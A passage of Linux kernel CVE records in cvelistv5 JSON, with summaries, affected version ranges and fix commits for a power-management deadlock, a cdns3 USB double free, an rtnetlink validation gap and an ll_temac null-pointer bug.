},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPM: sleep: Fix possible deadlocks in core system-wide PM code\n\nIt is reported that in low-memory situations the system-wide resume core\ncode deadlocks, because async_schedule_dev() executes its argument\nfunction synchronously if it cannot allocate memory (and not only in\nthat case) and that function attempts to acquire a mutex that is already\nheld. Executing the argument function synchronously from within\ndpm_async_fn() may also be problematic for ordering reasons (it may\ncause a consumer device\u0027s resume callback to be invoked before a\nrequisite supplier device\u0027s one, for example).\n\nAddress this by changing the code in question to use\nasync_schedule_dev_nocall() for scheduling the asynchronous\nexecution of device suspend and resume functions and to directly\nrun them synchronously if async_schedule_dev_nocall() returns false."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:38:01.601Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f46eb832389f162ad13cb780d0b8cde93641990d"
},
{
"url": "https://git.kernel.org/stable/c/a1d62c775b07213c73f81ae842424c74dd14b5f0"
},
{
"url": "https://git.kernel.org/stable/c/e1c9d32c98309ae764893a481552d3f99d46cb34"
},
{
"url": "https://git.kernel.org/stable/c/e681e29d1f59a04ef773296e4bebb17b1b79f8fe"
},
{
"url": "https://git.kernel.org/stable/c/9bd3dce27b01c51295b60e1433e1dadfb16649f7"
},
{
"url": "https://git.kernel.org/stable/c/7839d0078e0d5e6cc2fa0b0dfbee71de74f1e557"
}
],
"title": "PM: sleep: Fix possible deadlocks in core system-wide PM code",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52498",
"datePublished": "2024-02-29T15:52:14.029Z",
"dateReserved": "2024-02-20T12:30:33.305Z",
"dateUpdated": "2025-05-04T07:38:01.601Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26748 (GCVE-0-2024-26748)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: cdns3: fix memory double free when handle zero packet
829 if (request->complete) {
830 spin_unlock(&priv_dev->lock);
831 usb_gadget_giveback_request(&priv_ep->endpoint,
832 request);
833 spin_lock(&priv_dev->lock);
834 }
835
836 if (request->buf == priv_dev->zlp_buf)
837 cdns3_gadget_ep_free_request(&priv_ep->endpoint, request);
Driver append an additional zero packet request when queue a packet, which
length mod max packet size is 0. When transfer complete, run to line 831,
usb_gadget_giveback_request() will free this requestion. 836 condition is
true, so cdns3_gadget_ep_free_request() free this request again.
Log:
[ 1920.140696][ T150] BUG: KFENCE: use-after-free read in cdns3_gadget_giveback+0x134/0x2c0 [cdns3]
[ 1920.140696][ T150]
[ 1920.151837][ T150] Use-after-free read at 0x000000003d1cd10b (in kfence-#36):
[ 1920.159082][ T150] cdns3_gadget_giveback+0x134/0x2c0 [cdns3]
[ 1920.164988][ T150] cdns3_transfer_completed+0x438/0x5f8 [cdns3]
Add check at line 829, skip call usb_gadget_giveback_request() if it is
additional zero length packet request. Needn't call
usb_gadget_giveback_request() because it is allocated in this driver.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe Version: 7733f6c32e36ff9d7adadf40001039bf219b1cbe |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26748",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-05T17:31:00.230088Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:02.965Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.207Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aad6132ae6e4809e375431f8defd1521985e44e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1e204a8e9eb514e22a6567fb340ebb47df3f3a48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a2a909942b5335b7ea66366d84261b3ed5f89c8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a52b694b066f299d8b9800854a8503457a8b64c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70e8038813f9d3e72df966748ebbc40efe466019"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92d20406a3d4ff3e8be667c79209dc9ed31df5b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5fd9e45f1ebcd57181358af28506e8a661a260b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/cdns3/cdns3-gadget.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "aad6132ae6e4809e375431f8defd1521985e44e7",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "1e204a8e9eb514e22a6567fb340ebb47df3f3a48",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "3a2a909942b5335b7ea66366d84261b3ed5f89c8",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "9a52b694b066f299d8b9800854a8503457a8b64c",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "70e8038813f9d3e72df966748ebbc40efe466019",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "92d20406a3d4ff3e8be667c79209dc9ed31df5b3",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
},
{
"lessThan": "5fd9e45f1ebcd57181358af28506e8a661a260b3",
"status": "affected",
"version": "7733f6c32e36ff9d7adadf40001039bf219b1cbe",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/cdns3/cdns3-gadget.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: cdns3: fix memory double free when handle zero packet\n\n829 if (request-\u003ecomplete) {\n830 spin_unlock(\u0026priv_dev-\u003elock);\n831 usb_gadget_giveback_request(\u0026priv_ep-\u003eendpoint,\n832 request);\n833 spin_lock(\u0026priv_dev-\u003elock);\n834 }\n835\n836 if (request-\u003ebuf == priv_dev-\u003ezlp_buf)\n837 cdns3_gadget_ep_free_request(\u0026priv_ep-\u003eendpoint, request);\n\nDriver append an additional zero packet request when queue a packet, which\nlength mod max packet size is 0. When transfer complete, run to line 831,\nusb_gadget_giveback_request() will free this requestion. 836 condition is\ntrue, so cdns3_gadget_ep_free_request() free this request again.\n\nLog:\n\n[ 1920.140696][ T150] BUG: KFENCE: use-after-free read in cdns3_gadget_giveback+0x134/0x2c0 [cdns3]\n[ 1920.140696][ T150]\n[ 1920.151837][ T150] Use-after-free read at 0x000000003d1cd10b (in kfence-#36):\n[ 1920.159082][ T150] cdns3_gadget_giveback+0x134/0x2c0 [cdns3]\n[ 1920.164988][ T150] cdns3_transfer_completed+0x438/0x5f8 [cdns3]\n\nAdd check at line 829, skip call usb_gadget_giveback_request() if it is\nadditional zero length packet request. Needn\u0027t call\nusb_gadget_giveback_request() because it is allocated in this driver."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:36.651Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/aad6132ae6e4809e375431f8defd1521985e44e7"
},
{
"url": "https://git.kernel.org/stable/c/1e204a8e9eb514e22a6567fb340ebb47df3f3a48"
},
{
"url": "https://git.kernel.org/stable/c/3a2a909942b5335b7ea66366d84261b3ed5f89c8"
},
{
"url": "https://git.kernel.org/stable/c/9a52b694b066f299d8b9800854a8503457a8b64c"
},
{
"url": "https://git.kernel.org/stable/c/70e8038813f9d3e72df966748ebbc40efe466019"
},
{
"url": "https://git.kernel.org/stable/c/92d20406a3d4ff3e8be667c79209dc9ed31df5b3"
},
{
"url": "https://git.kernel.org/stable/c/5fd9e45f1ebcd57181358af28506e8a661a260b3"
}
],
"title": "usb: cdns3: fix memory double free when handle zero packet",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26748",
"datePublished": "2024-04-03T17:00:35.087Z",
"dateReserved": "2024-02-19T14:20:24.168Z",
"dateUpdated": "2025-05-04T08:55:36.651Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36017 (GCVE-0-2024-36017)
Vulnerability from cvelistv5
Published
2024-05-30 12:52
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
rtnetlink: Correct nested IFLA_VF_VLAN_LIST attribute validation
Each attribute inside a nested IFLA_VF_VLAN_LIST is assumed to be a
struct ifla_vf_vlan_info so the size of such attribute needs to be at least
of sizeof(struct ifla_vf_vlan_info) which is 14 bytes.
The current size validation in do_setvfinfo is against NLA_HDRLEN (4 bytes)
which is less than sizeof(struct ifla_vf_vlan_info) so this validation
is not enough and a too small attribute might be cast to a
struct ifla_vf_vlan_info, this might result in an out of bands
read access when accessing the saved (casted) entry in ivvl.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 79aab093a0b5370d7fc4e99df75996f4744dc03f Version: 79aab093a0b5370d7fc4e99df75996f4744dc03f Version: 79aab093a0b5370d7fc4e99df75996f4744dc03f Version: 79aab093a0b5370d7fc4e99df75996f4744dc03f Version: 79aab093a0b5370d7fc4e99df75996f4744dc03f Version: 79aab093a0b5370d7fc4e99df75996f4744dc03f Version: 79aab093a0b5370d7fc4e99df75996f4744dc03f Version: 79aab093a0b5370d7fc4e99df75996f4744dc03f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36017",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-10T18:50:37.165926Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-10T18:50:48.941Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:12.437Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ac69ff2d0d5be9734c4402de932aa3dc8549c1a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5e7ef2d88666a0212db8c38e6703864b9ce70169"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6c8f44b02500c7d14b5e6618fe4ef9a0da47b3de"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f3c1bf3054f96ddeab0621d920445bada769b40e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e4c7193954f4faab92f6e8d88bc5565317b44e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/206003c748b88890a910ef7142d18f77be57550b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a4b9757789a1551d2df130df23bfb3545bfa7e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1aec77b2bb2ed1db0f5efc61c4c1ca3813307489"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/rtnetlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8ac69ff2d0d5be9734c4402de932aa3dc8549c1a",
"status": "affected",
"version": "79aab093a0b5370d7fc4e99df75996f4744dc03f",
"versionType": "git"
},
{
"lessThan": "5e7ef2d88666a0212db8c38e6703864b9ce70169",
"status": "affected",
"version": "79aab093a0b5370d7fc4e99df75996f4744dc03f",
"versionType": "git"
},
{
"lessThan": "6c8f44b02500c7d14b5e6618fe4ef9a0da47b3de",
"status": "affected",
"version": "79aab093a0b5370d7fc4e99df75996f4744dc03f",
"versionType": "git"
},
{
"lessThan": "f3c1bf3054f96ddeab0621d920445bada769b40e",
"status": "affected",
"version": "79aab093a0b5370d7fc4e99df75996f4744dc03f",
"versionType": "git"
},
{
"lessThan": "6e4c7193954f4faab92f6e8d88bc5565317b44e7",
"status": "affected",
"version": "79aab093a0b5370d7fc4e99df75996f4744dc03f",
"versionType": "git"
},
{
"lessThan": "206003c748b88890a910ef7142d18f77be57550b",
"status": "affected",
"version": "79aab093a0b5370d7fc4e99df75996f4744dc03f",
"versionType": "git"
},
{
"lessThan": "4a4b9757789a1551d2df130df23bfb3545bfa7e8",
"status": "affected",
"version": "79aab093a0b5370d7fc4e99df75996f4744dc03f",
"versionType": "git"
},
{
"lessThan": "1aec77b2bb2ed1db0f5efc61c4c1ca3813307489",
"status": "affected",
"version": "79aab093a0b5370d7fc4e99df75996f4744dc03f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/rtnetlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.9"
},
{
"lessThan": "4.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrtnetlink: Correct nested IFLA_VF_VLAN_LIST attribute validation\n\nEach attribute inside a nested IFLA_VF_VLAN_LIST is assumed to be a\nstruct ifla_vf_vlan_info so the size of such attribute needs to be at least\nof sizeof(struct ifla_vf_vlan_info) which is 14 bytes.\nThe current size validation in do_setvfinfo is against NLA_HDRLEN (4 bytes)\nwhich is less than sizeof(struct ifla_vf_vlan_info) so this validation\nis not enough and a too small attribute might be cast to a\nstruct ifla_vf_vlan_info, this might result in an out of bands\nread access when accessing the saved (casted) entry in ivvl."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:10:39.898Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8ac69ff2d0d5be9734c4402de932aa3dc8549c1a"
},
{
"url": "https://git.kernel.org/stable/c/5e7ef2d88666a0212db8c38e6703864b9ce70169"
},
{
"url": "https://git.kernel.org/stable/c/6c8f44b02500c7d14b5e6618fe4ef9a0da47b3de"
},
{
"url": "https://git.kernel.org/stable/c/f3c1bf3054f96ddeab0621d920445bada769b40e"
},
{
"url": "https://git.kernel.org/stable/c/6e4c7193954f4faab92f6e8d88bc5565317b44e7"
},
{
"url": "https://git.kernel.org/stable/c/206003c748b88890a910ef7142d18f77be57550b"
},
{
"url": "https://git.kernel.org/stable/c/4a4b9757789a1551d2df130df23bfb3545bfa7e8"
},
{
"url": "https://git.kernel.org/stable/c/1aec77b2bb2ed1db0f5efc61c4c1ca3813307489"
}
],
"title": "rtnetlink: Correct nested IFLA_VF_VLAN_LIST attribute validation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36017",
"datePublished": "2024-05-30T12:52:03.554Z",
"dateReserved": "2024-05-17T13:50:33.154Z",
"dateUpdated": "2025-05-04T09:10:39.898Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35796 (GCVE-0-2024-35796)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: ll_temac: platform_get_resource replaced by wrong function
The function platform_get_resource was replaced with
devm_platform_ioremap_resource_byname and is called using 0 as name.
This eventually ends up in platform_get_resource_byname in the call
stack, where it causes a null pointer in strcmp.
if (type == resource_type(r) && !strcmp(r->name, name))
It should have been replaced with devm_platform_ioremap_resource.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bd69058f50d5ffa659423bcfa6fe6280ce9c760a Version: bd69058f50d5ffa659423bcfa6fe6280ce9c760a Version: bd69058f50d5ffa659423bcfa6fe6280ce9c760a Version: bd69058f50d5ffa659423bcfa6fe6280ce9c760a Version: bd69058f50d5ffa659423bcfa6fe6280ce9c760a Version: bd69058f50d5ffa659423bcfa6fe6280ce9c760a Version: bd69058f50d5ffa659423bcfa6fe6280ce9c760a Version: 77c8cfdf808410be84be56aff7e0e186b8c5a879 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35796",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-31T18:39:44.232878Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-29T19:22:51.425Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.618Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d9395ba7f85bdb7af0b93272e537484ecbeff48"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/553d294db94b5f139378022df480a9fb6c3ae39e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/46efbdbc95a30951c2579caf97b6df2ee2b3bef3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/476eed5f1c22034774902a980aa48dc4662cb39a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e9edb569fd9f688d887e36db8170f6e22bafbc8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/92c0c29f667870f17c0b764544bdf22ce0e886a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a38a829c8bc27d78552c28e582eb1d885d07d11"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/xilinx/ll_temac_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6d9395ba7f85bdb7af0b93272e537484ecbeff48",
"status": "affected",
"version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
"versionType": "git"
},
{
"lessThan": "553d294db94b5f139378022df480a9fb6c3ae39e",
"status": "affected",
"version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
"versionType": "git"
},
{
"lessThan": "46efbdbc95a30951c2579caf97b6df2ee2b3bef3",
"status": "affected",
"version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
"versionType": "git"
},
{
"lessThan": "476eed5f1c22034774902a980aa48dc4662cb39a",
"status": "affected",
"version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
"versionType": "git"
},
{
"lessThan": "7e9edb569fd9f688d887e36db8170f6e22bafbc8",
"status": "affected",
"version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
"versionType": "git"
},
{
"lessThan": "92c0c29f667870f17c0b764544bdf22ce0e886a1",
"status": "affected",
"version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
"versionType": "git"
},
{
"lessThan": "3a38a829c8bc27d78552c28e582eb1d885d07d11",
"status": "affected",
"version": "bd69058f50d5ffa659423bcfa6fe6280ce9c760a",
"versionType": "git"
},
{
"status": "affected",
"version": "77c8cfdf808410be84be56aff7e0e186b8c5a879",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/xilinx/ll_temac_main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
